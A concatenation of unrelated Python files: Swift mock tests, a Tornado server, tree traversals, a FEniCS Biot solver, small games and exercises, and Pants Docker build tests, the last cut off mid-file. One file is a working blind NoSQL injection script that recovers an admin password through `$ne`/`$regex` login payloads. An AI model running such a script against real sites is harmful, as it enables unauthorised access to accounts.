            self.successResultOf(treq.content(create_container_response)),
            b"",
        )
    def test_create_container(self):
        """
        Test to verify create container using :obj:`SwiftMock`
        """
        self.createSwiftService()
        self.create_one_container(201)
    def test_create_twice(self):
        """
        Creating a container twice results in an ACCEPTED status code.
        """
        self.createSwiftService()
        self.create_one_container(201)
        self.create_one_container(202)
        self.create_one_container(202)
    def test_get_container(self):
        """
        Creating a container and immediately retrieving it yields an empty list
        (since there are no objects) and several headers indicating that no
        objects are in the container and they consume no space.
        """
        self.createSwiftService()
        # create a container
        uri = (self.json_body['access']['serviceCatalog'][0]['endpoints'][0]
               ['publicURL'] + '/testcontainer').encode("ascii")
        create_container = request(self, self.root, b"PUT", uri)
        self.successResultOf(create_container)
        container_response = self.successResultOf(
            request(self, self.root, b"GET", uri)
        )
        self.assertEqual(container_response.code, 200)
        container_contents = self.successResultOf(
            treq.json_content(container_response)
        )
        self.assertEqual(container_contents, [])
        self.assertEqual(
            container_response.headers.getRawHeaders(
                b"X-Container-Object-Count")[0], b"0"
        )
        self.assertEqual(
            container_response.headers.getRawHeaders(
                b"X-Container-Bytes-Used")[0], b"0"
        )
    def test_get_no_container(self):
        """
        GETing a container that has not been created results in a 404.
        """
        self.createSwiftService()
        # create a container
        uri = (self.json_body['access']['serviceCatalog'][0]['endpoints'][0]
               ['publicURL'] + '/testcontainer').encode("ascii")
        container_response = self.successResultOf(
            request(self, self.root, b"GET", uri)
        )
        self.assertEqual(container_response.code, 404)
        self.assertEqual(
            container_response.headers.getRawHeaders(
                "X-Container-Object-Count"), None
        )
        self.assertEqual(
            container_response.headers.getRawHeaders(
                "X-Container-Bytes-Used"), None
        )
    def test_put_object(self):
        """
        PUTting an object into a container causes the container to list that
        object.
        """
        self.createSwiftService()
        # create a container
        uri = (self.json_body['access']['serviceCatalog'][0]['endpoints'][0]
               ['publicURL'] + u'/testcontainer').encode('ascii')
        create_container = request(self, self.root, b"PUT", uri)
        self.successResultOf(create_container)
        BODY = b'some bytes'
        object_uri = uri + b"/" + b"testobject"
        object_response = request(self, self.root,
                                  b"PUT", object_uri,
                                  headers={b"content-type": [b"text/plain"]},
                                  body=BODY)
        self.assertEqual(self.successResultOf(object_response).code,
                         201)
        container_response = self.successResultOf(
            request(self, self.root, b"GET", uri)
        )
        self.assertEqual(container_response.code, 200)
        container_contents = self.successResultOf(
            treq.json_content(container_response)
        )
        self.assertEqual(len(container_contents), 1)
        self.assertEqual(container_contents[0]['name'], "testobject")
        self.assertEqual(container_contents[0]['content_type'], "text/plain")
        self.assertEqual(container_contents[0]['bytes'], len(BODY))
        object_response = self.successResultOf(
            request(self, self.root, b"GET", object_uri)
        )
        self.assertEqual(object_response.code, 200)
        object_body = self.successResultOf(treq.content(object_response))
        # FIX: assertEquals is a deprecated alias of assertEqual.
        self.assertEqual(object_body, BODY)
    def test_openstack_ids(self):
        """
        Non-Rackspace implementations of Swift just use the same tenant ID as
        other services in the catalog.
        (Note that this is not exposed by configuration yet, see
        U{https://github.com/rackerlabs/mimic/issues/85})
        """
        self.createSwiftService(False)
        url = (self.json_body['access']['serviceCatalog'][0]
               ['endpoints'][0]['publicURL'])
        self.assertIn("/fun_tenant", url)
        self.assertNotIn("/MossoCloudFS_", url)
|
import tornado.ioloop
import tornado.httpserver
from config import IS_DEVELOPMENT, PORT
from utils.logging_handler import Logger
from routes import make_app
# Entry point: dev runs a single process; production forks one worker per core.
if __name__ == "__main__":
    app = make_app()
    if IS_DEVELOPMENT:
        # Simple single-process listener for local development.
        app.listen(PORT)
        Logger.info("Development Server Running on :: http://0.0.0.0:{}".format(PORT))
    else:
        server = tornado.httpserver.HTTPServer(app)
        server.bind(PORT)
        Logger.info("Production Server Running on :: http://0.0.0.0:{}".format(PORT))
        # start(0) forks one worker process per CPU core.
        server.start(0)
    tornado.ioloop.IOLoop.current().start()
|
class BinaryNode(object):
    """A node in an unbalanced binary search tree (duplicates go right)."""
    def __init__(self, value):
        self.value = value  # payload stored at this node
        self.left = None
        self.right = None
    def add_child(self, value):
        """Insert *value* into the subtree rooted at this node."""
        side = 'left' if value < self.value else 'right'
        child = getattr(self, side)
        if child is None:
            setattr(self, side, BinaryNode(value))
        else:
            child.add_child(value)
    def depth(self):
        """Return the number of nodes on the longest root-to-leaf path."""
        child_depths = [c.depth() for c in (self.left, self.right) if c is not None]
        if not child_depths:
            return 1
        return 1 + max(child_depths)
    def __str__(self):
        return '%s -> (%s, %s)' % (self.value, self.left, self.right)
def build_binary_tree(nlist):
    """Build a BST by inserting nlist's items in order; None for empty input."""
    if not nlist:
        return None
    root = BinaryNode(nlist[0])
    for value in nlist[1:]:
        root.add_child(value)
    return root
def inorder(tree, result):
    """In-order (left, root, right) traversal; values are appended to *result*."""
    left, right = tree.left, tree.right
    if left is not None:
        inorder(left, result)
    result.append(tree.value)
    if right is not None:
        inorder(right, result)
def postorder(tree, result):
    """Post-order (left, right, root) traversal; values are appended to *result*."""
    for child in (tree.left, tree.right):
        if child is not None:
            postorder(child, result)
    result.append(tree.value)
def preorder(tree, result):
    """Pre-order (root, left, right) traversal; values are appended to *result*."""
    result.append(tree.value)
    for child in (tree.left, tree.right):
        if child is not None:
            preorder(child, result)
# Drawing the tree should be performed using preorder
if __name__ == '__main__':
    import random
    # Demo: build a tree from a random permutation of 0..n-1 and print
    # all three traversal orders.
    n = 10
    data = random.sample(range(n), n)
    print('Generating Binary Tree from: %s' % data)
    btree = build_binary_tree(data)
    print('Binary Tree: %s' % btree)
    print('Depth = %d' % btree.depth())
    data = []
    postorder(btree, data)
    print('Postorder: %s' % data)
    data = []
    inorder(btree, data)
    print('Inorder: %s' % data)
    data = []
    preorder(btree, data)
    print('Preorder: %s' % data)
|
# Keep prompting until the correct code (2002) is entered.
while True:
    attempt = int(input())
    if attempt == 2002:
        print('Acesso Permitido')
        break
    print('Senha Invalida')
import requests
import string
url = ""
username = "admin"
# "^" anchors the growing regex at the start of the stored password.
password = "^"
# BUG FIX: this was the literal Ellipsis (`...`), which is not iterable and
# crashed retrievePasswordString. Use the (previously unused) string module.
# NOTE(review): regex metacharacters are excluded on purpose, since each
# candidate character is injected into a $regex pattern unescaped.
possible_chars = string.ascii_letters + string.digits
def retrievePasswordLength(url, username):
    """Probe the password length via a NoSQL `$regex` length injection.

    Tries `.{x}` for x = 1..24; the first length whose request stops
    redirecting (HTTP 200 instead of 302) means x-1 characters matched.
    """
    for length in range(1, 25):
        payload = {
            "username[$ne]": username,
            "password[$regex]": ".{" + str(length) + "}",
            "login": "login",
        }
        response = requests.post(url, data=payload, verify=False, allow_redirects=False)
        status = int(response.status_code)
        if status == 200:
            print("Password length is : {}".format(length - 1))
            break
        elif status == 302:
            print("Not yet")
#retrievePasswordLength(url, username)
def retrievePasswordString(url, username, password):
    """Recover the password one character at a time via `$regex` injection.

    Extends the anchored regex in `password` with each candidate character;
    a 302 redirect means the prefix matched, so the character is kept and
    the scan restarts for the next position.
    """
    found_more = True
    while found_more:
        found_more = False
        for candidate in possible_chars:
            payload = {
                'username[$ne]': username,
                'password[$regex]': password + candidate,
                'login': 'login',
            }
            response = requests.post(url, data=payload, verify=False, allow_redirects=False)
            if int(response.status_code) == 302:
                print("Found one more char : %s" % (password + candidate))
                password += candidate
                found_more = True
                break

retrievePasswordString(url, username, password)
|
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 25 23:46:27 2018
@author: Angela
"""
def operate(a, b, oper):
    """Apply an arithmetic operation to a and b.

    Parameters:
        a, b: the operands.
        oper (str): one of '+', '-', '*', '/'.

    Raises:
        TypeError: if oper is not a string.
        ZeroDivisionError: on division by zero.
        ValueError: if oper is not a supported operator.
    """
    # isinstance is the idiomatic type check (also accepts str subclasses).
    if not isinstance(oper, str):
        raise TypeError("oper must be a string")
    elif oper == '+':
        return a + b
    elif oper == '-':
        return a - b
    elif oper == '*':
        return a * b
    elif oper == '/':
        if b == 0:
            raise ZeroDivisionError("division by zero is undefined")
        return a / b
    raise ValueError("oper must be one of '+', '/', '-', or '*'")
def test_operate():
    """Exercise operate() across all four operators and the zero-division path."""
    assert operate(1, 3,'+') == 4, "failed on positive integers"
    assert operate(-5, -7,'+') == -12, "failed on negative integers"
    assert operate(1, 3,'-') == -2, "failed on positive integers"
    assert operate(-5, -7,'-') == 2, "failed on negative integers"
    assert operate(3, 1,'-') == 2, "failed on positive integers"
    assert operate(-5, 7,'-') == -12, "failed on mixed integers"
    assert operate(1, 3,'*') == 3, "failed on positive integers"
    assert operate(-5, -7,'*') == 35, "failed on negative integers"
    assert operate(-5, 7,'*') == -35, "failed on mixed integers"
    assert operate(4,2,'/') == 2, "integer division"
    assert operate(5,4,'/') == 1.25, "float division"
    # BUG FIX: the original line was a SyntaxError (positional argument after
    # keyword arguments) and used pytest without importing it. A plain
    # try/except asserts the same behavior with no extra dependency.
    try:
        operate(4, 0, '/')
    except ZeroDivisionError:
        pass
    else:
        raise AssertionError("division by zero did not raise ZeroDivisionError")
import dump
from itm import UCWrappedFunctionality
from utils import wait_for
import logging
log = logging.getLogger(__name__)
class Async_Channel(UCWrappedFunctionality):
    """One-shot asynchronous channel between a fixed sender and receiver.

    The SID tuple encodes (ssid, sender, receiver, round). A 'send' from the
    sender is scheduled through the wrapper ('f2w') and leaked; the receiver
    retrieves the delivered message with 'fetch'. All other inputs dump.
    """
    def __init__(self, sid, pid, channels, pump, poly, importargs):
        self.ssid = sid[0]
        self.sender = sid[1]
        self.receiver = sid[2]
        self.round = sid[3]
        self.pump = pump
        UCWrappedFunctionality.__init__(self, sid, pid, channels, poly, importargs)
        # NOTE(review): nothing appends to this buffer before adv_get_leaks()
        # resets it to [], so the first 'get-leaks' sends None. Presumably it
        # should start as [] -- confirm against the adversary's expectations.
        self.leakbuffer = None

    def leak(self, msg):
        """Report a leaked message to the wrapper."""
        self.write('f2w', ('leak', msg) )

    def send_message(self, msg, imp):
        """Deliver `msg` to the receiver (invoked when the wrapper schedules it)."""
        log.debug('\033[91m [F_channel to={}, from={}] {}\033[0m'.format(self.receiver[1], self.sender[1], msg))
        self.write('f2p', (self.receiver, msg), imp)

    def party_send(self, sender, msg, imp):
        """Handle a 'send' input: schedule delivery, leak, and ack the sender."""
        print('Party send', msg)
        if sender == self.sender:
            log.debug('import: {}'.format(imp))
            # Ask the wrapper to schedule the actual delivery callback.
            self.write( 'f2w', ('schedule', self.send_message, (msg,imp)), 0)
            assert wait_for(self.w2f).msg == ('OK',)
            self.leak( msg )
            self.write('f2p', (self.sender, 'OK'))
        else:
            # Only the designated sender may send; everyone else dumps.
            self.pump.write("dump")

    def party_fetch(self, sender, msg):
        """Handle a 'fetch' input: hand the stored message to the receiver."""
        # NOTE(review): self.M is never assigned in this class -- presumably
        # set by the scheduled delivery path or the base class; confirm.
        if sender == self.receiver and self.M:
            #self.f2p.write( (self.receiver, ('sent', self.M)) )
            # TODO sent import too
            self.write( 'f2p', (self.receiver, ('sent', self.M)) )
        else:
            self.pump.write("dump")

    def party_msg(self, d):
        """Dispatch party input to 'send' / 'fetch'; anything else dumps."""
        msg = d.msg
        imp = d.imp
        sender,msg = msg
        if msg[0] == 'send':
            self.party_send(sender, msg, imp)
        elif msg[0] == 'fetch':
            self.party_fetch(sender, msg)
        else:
            self.pump.write("dump")

    def adv_get_leaks(self):
        """Send the accumulated leaks to the adversary and clear the buffer."""
        # BUG FIX: the original called an undefined global `write(...)`; the
        # commented-out line showed the intent: send the buffer on f2a with 0 import.
        self.write( 'f2a', self.leakbuffer, 0 )
        self.leakbuffer = []

    def adv_msg(self, d):
        """Dispatch adversary input; only 'get-leaks' is supported."""
        msg = d.msg
        imp = d.imp
        if msg[0] == 'get-leaks':
            self.adv_get_leaks()
        else:
            self.pump.write("dump")

    def env_msg(self, msg):
        """The environment has no direct interface to the channel."""
        self.pump.write("dump")

    def wrapper_msg(self, msg):
        """Wrapper input is ignored."""
        # BUG FIX: was `self.pump_write(...)` (AttributeError); every other
        # handler uses self.pump.write.
        self.pump.write("dump")
|
"""
FENICS script for solving the Biot system using iterative fixed stress splitting method w
with mixed elements
Author: Mats K. Brun
"""
from fenics import *
from dolfin.cpp.mesh import *
from dolfin.cpp.io import *
#from dolfin.fem.bcs import *
#from dolfin.fem.interpolation import *
#from dolfin.fem.solving import *
import numpy as np
import sympy as sy
# <editor-fold desc="Parameters">
# NOTE(review): this is a Python 2 script (print statements below).
dim = 2 # spatial dimension
eps = 10.0E-6 # error tolerance
T_final = 1.0 # final time
number_of_steps = 10 # number of steps
dt = T_final / number_of_steps # time step
alpha = 1.0 # Biot's coeff
E = 1.0 # bulk modulus
nu = 0.25 # Poisson ratio \in (0, 0.5)
M = 1.0 # Biot modulus
K = 1.0 # permeability divided by fluid viscosity
lambd = 3.0*E*nu/(nu + 1.0) # Lame param 1
mu = 3.0*E*(1.0 - 2.0*nu)/2.0/(nu + 1.0) # Lame param 2
# Fixed-stress stabilization coefficient: alpha^2 / (2*(2*mu/d + lambda)).
betaFS = alpha**2/2.0/(2.0*mu/dim + lambd) # tuning param
# </editor-fold>
# <editor-fold desc="Exact solutions and RHS">
# Method of manufactured solutions: pick closed-form p, u, derive the
# matching right-hand sides symbolically, then verify convergence.
# Define variables used by sympy
x, y, t = sy.symbols('x[0], x[1], t')
# Exact solutions
pressure = t*x*(1.0 - x)*y*(1.0 - y) # pressure
u1 = t*x*(1.0 - x)*y*(1.0 - y) # displacement comp 1
u2 = t*x*(1.0 - x)*y*(1.0 - y) # displacement comp 2
px = sy.diff(pressure, x)
py = sy.diff(pressure, y)
# Darcy flux w = -K * grad(p)
w1 = - K*px # flux comp 1
w2 = - K*py # flux comp 2
# partial derivatives
u1x = sy.diff(u1, x)
u1y = sy.diff(u1, y)
u1xx = sy.diff(u1, x, x)
u1yy = sy.diff(u1, y, y)
u1xy = sy.diff(u1, x, y)
u2x = sy.diff(u2, x)
u2y = sy.diff(u2, y)
u2xx = sy.diff(u2, x, x)
u2yy = sy.diff(u2, y, y)
u2xy = sy.diff(u2, x, y)
w1x = sy.diff(w1, x)
w2y = sy.diff(w2, y)
# right hand sides
# Mass balance source: d/dt(p/M + alpha*div u) + div w
Sf = sy.diff(1.0/M*pressure + alpha*(u1x + u2y), t) + w1x + w2y
# Momentum balance body force: -div(2*mu*eps(u)) - lambd*grad(div u) + alpha*grad(p)
# NOTE(review): in f2 the term 0.5*(u1xy + u2yy) looks like it should be
# 0.5*(u1xy + u2xx), and the lambd terms drop the cross derivatives
# (u2xy in f1, u1xy in f2) -- confirm against the elasticity operator.
f1 = - 2.0*mu*(u1xx + 0.5*(u2xy + u1yy)) - lambd*u1xx + alpha*px
f2 = - 2.0*mu*(u2yy + 0.5*(u1xy + u2yy)) - lambd*u2yy + alpha*py
# simplify expressions
pressure = sy.simplify(pressure)
u1 = sy.simplify(u1)
u2 = sy.simplify(u2)
w1 = sy.simplify(w1)
w2 = sy.simplify(w2)
Sf = sy.simplify(Sf)
f1 = sy.simplify(f1)
f2 = sy.simplify(f2)
# convert expressions to C++ syntax
p_code = sy.printing.ccode(pressure)
u1_code = sy.printing.ccode(u1)
u2_code = sy.printing.ccode(u2)
w1_code = sy.printing.ccode(w1)
w2_code = sy.printing.ccode(w2)
Sf_code = sy.printing.ccode(Sf)
f1_code = sy.printing.ccode(f1)
f2_code = sy.printing.ccode(f2)
# print the exact solutions and RHS
print """ Exact solutions as ccode:
p = \t %r
u1 = \t %r
u2 = \t %r
w1 = \t %r
w2 = \t %r
Sf = \t %r
f1 = \t %r
f2 = \t %r
""" % (p_code, u1_code, u2_code, w1_code, w2_code, Sf_code, f1_code, f2_code)
# </editor-fold>
# <editor-fold desc="Mesh and function spaces">
# generate unit square mesh
mesh = UnitSquareMesh(64, 64)
mesh_size = mesh.hmax()
# define function spaces
U = VectorFunctionSpace(mesh, 'P', 1) # space for displacement
P_elem = FiniteElement('DG', mesh.ufl_cell(), 0) # element for pressure
W_elem = FiniteElement('RT', mesh.ufl_cell(), 1) # element for flux
WP_elem = W_elem * P_elem # mixed element for flux and pressure
WP = FunctionSpace(mesh, WP_elem) # mixed space for flux and pressure
# exact solutions and RHS
# degree=5 so the interpolation error of the exact solution does not
# pollute the computed error norms.
w_ex = Expression((w1_code, w2_code), degree=5, t=0)
p_ex = Expression(p_code, degree=5, t=0)
u_ex = Expression((u1_code, u2_code), degree=5, t=0)
Sf = Expression(Sf_code, degree=1, t=0)
f = Expression((f1_code, f2_code), degree=1, t=0)
# </editor-fold>
# <editor-fold desc="BC and IC">
# Define boundary points
def boundary(x, on_boundary):
    # Mark the entire boundary for the Dirichlet conditions.
    return on_boundary
# Dirichlet BC for displacement and pressure
bc_u = DirichletBC(U, u_ex, boundary)
bc_wp = DirichletBC(WP.sub(1), p_ex, boundary)  # sub(1) = pressure component
# trial and test functions
u = TrialFunction(U)
v = TestFunction(U)
w, p = TrialFunctions(WP)
z, q = TestFunctions(WP)
# initial conditions (homogenous) and previous time-step/iteration
# Convention: *_n = previous time step, *_ = previous fixed-stress iteration.
u_n = Function(U)
u_ = Function(U)
wp_n = Function(WP)
wp_ = Function(WP)
w_n, p_n = split(wp_n)
w_, p_ = split(wp_)
# </editor-fold>
# <editor-fold desc="Variational form">
# define symmetric gradient
def epsilon(u):
    # Linearized strain tensor: eps(u) = (grad u + grad u^T) / 2.
    return sym(nabla_grad(u))
# Constants for use in var form
# (re-binding the Python floats as FEniCS Constants avoids form recompilation)
dt = Constant(dt)
alpha = Constant(alpha)
M = Constant(M)
K = Constant(K)
g = Constant((0.0, 0.0)) # gravitational force
lambd = Constant(lambd)
mu = Constant(mu)
betaFS = Constant(betaFS)
rho_f = Constant(1.0) # fluid density
# define var problem for step 1 (pressure and flux)
# Fixed-stress split: flow solved first with betaFS stabilization,
# using displacement from the previous iteration (u_).
a1 = (1/M + betaFS)*p*q*dx + dt*div(w)*q*dx + 1/K*dot(w, z)*dx - p*div(z)*dx
L1 = dt*Sf*q*dx + 1/M*p_n*q*dx + alpha*div(u_n)*q*dx \
     + betaFS*p_*q*dx - alpha*div(u_)*q*dx + rho_f*dot(g, z)*dx
# define var problem for step 2 (displacement)
# Mechanics solved second with the freshly computed pressure p_.
a2 = 2*mu*inner(epsilon(u), epsilon(v))*dx + lambd*div(u)*div(v)*dx
L2 = dot(f, v)*dx + alpha*p_*div(v)*dx
# Define solutions
u = Function(U)
wp = Function(WP)
# </editor-fold>
# Create VTK file for saving solution, .pvd or .xdmf
vtkfile_w = File('Biot_FSSM/flux.pvd')
vtkfile_p = File('Biot_FSSM/pressure.pvd')
vtkfile_u = File('Biot_FSSM/displacement.pvd')
# initialize time
time = 0.0
# start computation
for i in range(number_of_steps):
    # update time
    time += float(dt)
    # Propagate the new time into every time-dependent expression.
    u_ex.t = time
    w_ex.t = time
    p_ex.t = time
    Sf.t = time
    f.t = time
    # do iterations
    # NOTE(review): a fixed count of 10 fixed-stress iterations is used; the
    # tolerance `eps` defined above is never checked -- confirm intent.
    for j in range(10):
        # step 1: solve the flow subproblem (flux + pressure)
        solve(a1 == L1, wp, bc_wp)
        _w_, _p_ = wp.split()
        wp_.assign(wp) # update previous iteration
        # step 2: solve the mechanics subproblem (displacement)
        solve(a2 == L2, u, bc_u)
        u_.assign(u) # update previous iteration
    # update previous time step
    wp_n.assign(wp)
    u_n.assign(u)
    # <editor-fold desc="Compute and print errors">
    # Compute errors in L2 norm
    flux_error_L2 = errornorm(w_ex, _w_, 'L2')
    pressure_error_L2 = errornorm(p_ex, _p_, 'L2')
    displacement_error_L2 = errornorm(u_ex, u, 'L2')
    # interpolate exact solutions at current step
    w_e = interpolate(w_ex, WP.sub(0).collapse())
    p_e = interpolate(p_ex, WP.sub(1).collapse())
    u_e = interpolate(u_ex, U)
    # Compute maximum error at vertices
    vertex_values_w_e = w_e.compute_vertex_values(mesh)
    vertex_values_w = _w_.compute_vertex_values(mesh)
    flux_error_max = np.max(np.abs(vertex_values_w_e - vertex_values_w))
    vertex_values_u_e = u_e.compute_vertex_values(mesh)
    vertex_values_u = u.compute_vertex_values(mesh)
    displacement_error_max = np.max(np.abs(vertex_values_u_e - vertex_values_u))
    vertex_values_p_e = p_e.compute_vertex_values(mesh)
    vertex_values_p = _p_.compute_vertex_values(mesh)
    pressure_error_max = np.max(np.abs(vertex_values_p_e - vertex_values_p))
    # print errors
    print """ \n Errors in L2 and max norm: \n
    \t flux error in L2-norm: \t \t %r
    \t flux error in max-norm: \t \t %r \n
    \t pressure error in L2-norm: \t \t %r
    \t pressure error in max-norm: \t \t %r \n
    \t displacement error in L2-norm: \t %r
    \t displacement error in max-norm: \t %r
    """ % (flux_error_L2, flux_error_max, pressure_error_L2,
           pressure_error_max, displacement_error_L2, displacement_error_max)
    # </editor-fold>
    # save to file
    vtkfile_w << _w_, time
    vtkfile_u << u, time
    vtkfile_p << _p_, time
# print value of parameters
print """ Parameters: \n
\t time step: \t %r
\t final time: \t %r
\t lambda: \t %r
\t mu: \t \t %r
\t betaFS: \t %r \n """ % (float(dt), float(time), float(lambd), float(mu), float(betaFS))
# print mesh size
print """ Mesh size: \n
\t %r
""" % mesh_size
|
# Works; doesn't validate alternate input styles, and has no game loop or score keeping.
v_i = ['r', 'p', 's']  # valid inputs: rock, paper, scissors
import random
player_move = "get the move!"  # placeholder; overwritten by get_input()
print("RPS!")
def get_input():
    """Prompt for a throw; on a valid move hand off to judgement(), else re-prompt."""
    global player_move
    player_move = input("Throw: \n")
    # The check is case-insensitive, but the raw input is kept as entered.
    if player_move.lower() not in v_i:
        print("Bad input")
        get_input()  # recurse until valid input
    else:
        judgement()
def judgement():
    """Pick the computer's move, announce both moves, and print the outcome."""
    global player_move
    computer_move = random.choice(v_i)
    print('player picked ' + player_move)
    print('computer picked ' + computer_move)
    # Outcome messages keyed on (computer, player); ties handled separately.
    outcomes = {
        ('r', 'p'): 'you win p beats r',
        ('r', 's'): 'you loose r beat s',
        ('p', 'r'): 'you loose p beat r',
        ('p', 's'): 'you win s beat p',
        ('s', 'r'): 'you win r beat s',
        ('s', 'p'): 'you loose s beat p',
    }
    if computer_move == player_move:
        print('tie')
    else:
        message = outcomes.get((computer_move, player_move))
        # Like the original if/elif chain, unknown combinations (e.g. an
        # upper-case throw) print nothing at all.
        if message is not None:
            print(message)

get_input()
|
from datetime import datetime
def solve(n):
    """Reflect (x0, y0) through (x1, y1) and return the mirror point as "x y"."""
    x0, y0, x1, y1 = n
    # Point reflection: mirror = 2 * pivot - original.
    mirror_x = 2 * x1 - x0
    mirror_y = 2 * y1 - y0
    return "{0} {1}".format(mirror_x, mirror_y)
if __name__ == '__main__':
    '''
    T = int(input()) # number of test cases
    tests = []
    for i in range(T):
        N = input() # number of cycles in test scenario
        tests.append(map(int,N.split()))
    '''
    # Hard-coded sample cases (stdin parsing above is kept for reference).
    tests = [
        [0, 0, 1, 1],
        [1, 1, 2, 1]
    ]
    start_time = datetime.now()
    for i in tests:
        print(solve(i))
    # Wall-clock duration for the whole batch.
    time_taken = datetime.now() - start_time
    print("--->\tAll Time taken: {0}".format(time_taken))
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import json
import os
import zipfile
from textwrap import dedent
from typing import Any, ContextManager
import pytest
from pants.backend.docker.goals import package_image
from pants.backend.docker.subsystems import dockerfile_parser
from pants.backend.docker.subsystems.dockerfile_parser import DockerfileInfo
from pants.backend.docker.target_types import DockerImageTarget
from pants.backend.docker.util_rules import (
dependencies,
docker_binary,
docker_build_args,
docker_build_context,
docker_build_env,
dockerfile,
)
from pants.backend.docker.util_rules.docker_build_args import DockerBuildArgs
from pants.backend.docker.util_rules.docker_build_context import (
DockerBuildContext,
DockerBuildContextRequest,
)
from pants.backend.docker.util_rules.docker_build_env import DockerBuildEnvironment
from pants.backend.docker.value_interpolation import DockerBuildArgsInterpolationValue
from pants.backend.python import target_types_rules
from pants.backend.python.goals import package_pex_binary
from pants.backend.python.goals.package_pex_binary import PexBinaryFieldSet
from pants.backend.python.target_types import PexBinary, PythonRequirementTarget
from pants.backend.python.util_rules import pex_from_targets
from pants.backend.shell.target_types import ShellSourcesGeneratorTarget, ShellSourceTarget
from pants.backend.shell.target_types import rules as shell_target_types_rules
from pants.core.goals import package
from pants.core.goals.package import BuiltPackage
from pants.core.target_types import FilesGeneratorTarget
from pants.core.target_types import rules as core_target_types_rules
from pants.core.util_rules.environments import DockerEnvironmentTarget
from pants.engine.addresses import Address
from pants.engine.fs import EMPTY_DIGEST, EMPTY_SNAPSHOT, Snapshot
from pants.engine.internals.scheduler import ExecutionError
from pants.testutil.pytest_util import no_exception
from pants.testutil.rule_runner import QueryRule, RuleRunner
from pants.util.value_interpolation import InterpolationContext, InterpolationValue
def create_rule_runner() -> RuleRunner:
    """Build a RuleRunner wired with all docker/python/shell rules these tests need."""
    rule_runner = RuleRunner(
        rules=[
            *core_target_types_rules(),
            *dependencies.rules(),
            *docker_binary.rules(),
            *docker_build_args.rules(),
            *docker_build_context.rules(),
            *docker_build_env.rules(),
            *dockerfile.rules(),
            *dockerfile_parser.rules(),
            *package_image.rules(),
            *package_pex_binary.rules(),
            *pex_from_targets.rules(),
            *shell_target_types_rules(),
            *target_types_rules.rules(),
            package.environment_aware_package,
            package.find_all_packageable_targets,
            QueryRule(BuiltPackage, [PexBinaryFieldSet]),
            QueryRule(DockerBuildContext, (DockerBuildContextRequest,)),
        ],
        target_types=[
            PythonRequirementTarget,
            DockerEnvironmentTarget,
            DockerImageTarget,
            FilesGeneratorTarget,
            PexBinary,
            ShellSourcesGeneratorTarget,
            ShellSourceTarget,
        ],
    )
    return rule_runner
@pytest.fixture
def rule_runner() -> RuleRunner:
    """Function-scoped fixture: a fresh RuleRunner per test."""
    return create_rule_runner()
def assert_build_context(
    rule_runner: RuleRunner,
    address: Address,
    *,
    build_upstream_images: bool = False,
    expected_files: list[str],
    expected_interpolation_context: dict[str, str | dict[str, str] | InterpolationValue]
    | None = None,
    expected_num_upstream_images: int = 0,
    pants_args: list[str] | None = None,
    runner_options: dict[str, Any] | None = None,
) -> DockerBuildContext:
    """Request the DockerBuildContext for `address` and assert its contents.

    Checks the files in the context digest, optionally the interpolation
    context and the number of upstream images, then returns the context for
    further assertions by the caller.
    """
    # Work on copies so the caller's dicts are never mutated by this helper.
    runner_options = {} if runner_options is None else dict(runner_options)
    env_inherit = set(runner_options.get("env_inherit", ()))
    env_inherit.update({"PATH", "PYENV_ROOT", "HOME"})
    runner_options["env_inherit"] = env_inherit
    rule_runner.set_options(pants_args or [], **runner_options)
    context = rule_runner.request(
        DockerBuildContext,
        [
            DockerBuildContextRequest(
                address=address,
                build_upstream_images=build_upstream_images,
            )
        ],
    )
    snapshot = rule_runner.request(Snapshot, [context.digest])
    assert sorted(expected_files) == sorted(snapshot.files)
    if expected_interpolation_context is not None:
        # Copy before filling in derived entries, to avoid mutating the caller's dict.
        expected_interpolation_context = dict(expected_interpolation_context)
        build_args = expected_interpolation_context.get("build_args")
        if isinstance(build_args, dict):
            expected_interpolation_context["build_args"] = DockerBuildArgsInterpolationValue(
                build_args
            )
        if "pants" not in expected_interpolation_context:
            expected_interpolation_context["pants"] = context.interpolation_context["pants"]
        # Converting to `dict` to avoid the fact that FrozenDict is sensitive to the order of the keys.
        assert dict(context.interpolation_context) == dict(
            InterpolationContext.from_dict(expected_interpolation_context)
        )
    if build_upstream_images:
        assert len(context.upstream_image_ids) == expected_num_upstream_images
    return context
def test_pants_hash(rule_runner: RuleRunner) -> None:
    """The interpolation context exposes a stable `pants.hash` value."""
    rule_runner.write_files(
        {
            "test/BUILD": "docker_image()",
            "test/Dockerfile": "FROM base",
        }
    )
    assert_build_context(
        rule_runner,
        Address("test"),
        expected_files=["test/Dockerfile"],
        expected_interpolation_context={
            "tags": {
                "baseimage": "latest",
                "stage0": "latest",
            },
            "build_args": {},
            "pants": {"hash": "87e90685c07ac302bbff8f9d846b4015621255f741008485fd3ce72253ce54f4"},
        },
    )
def test_file_dependencies(rule_runner: RuleRunner) -> None:
    """Only files from (transitive) dependencies end up in an image's build context."""
    rule_runner.write_files(
        {
            # img_A -> files_A
            # img_A -> img_B
            "src/a/BUILD": dedent(
                """\
                docker_image(name="img_A", dependencies=[":files_A", "src/b:img_B"])
                files(name="files_A", sources=["files/**"])
                """
            ),
            "src/a/Dockerfile": "FROM base",
            "src/a/files/a01": "",
            "src/a/files/a02": "",
            # img_B -> files_B
            "src/b/BUILD": dedent(
                """\
                docker_image(name="img_B", dependencies=[":files_B"])
                files(name="files_B", sources=["files/**"])
                """
            ),
            "src/b/Dockerfile": "FROM base",
            "src/b/files/b01": "",
            "src/b/files/b02": "",
            # Mixed
            "src/c/BUILD": dedent(
                """\
                docker_image(name="img_C", dependencies=["src/a:files_A", "src/b:files_B"])
                """
            ),
            "src/c/Dockerfile": "FROM base",
        }
    )
    # We want files_B in build context for img_B
    assert_build_context(
        rule_runner,
        Address("src/b", target_name="img_B"),
        expected_files=["src/b/Dockerfile", "src/b/files/b01", "src/b/files/b02"],
    )
    # We want files_A in build context for img_A, but not files_B
    assert_build_context(
        rule_runner,
        Address("src/a", target_name="img_A"),
        expected_files=["src/a/Dockerfile", "src/a/files/a01", "src/a/files/a02"],
    )
    # Mixed.
    assert_build_context(
        rule_runner,
        Address("src/c", target_name="img_C"),
        expected_files=[
            "src/c/Dockerfile",
            "src/a/files/a01",
            "src/a/files/a02",
            "src/b/files/b01",
            "src/b/files/b02",
        ],
    )
def test_from_image_build_arg_dependency(rule_runner: RuleRunner) -> None:
    """A FROM build-arg pointing at another docker_image pulls that image in as upstream."""
    rule_runner.write_files(
        {
            "src/upstream/BUILD": dedent(
                """\
                docker_image(
                  name="image",
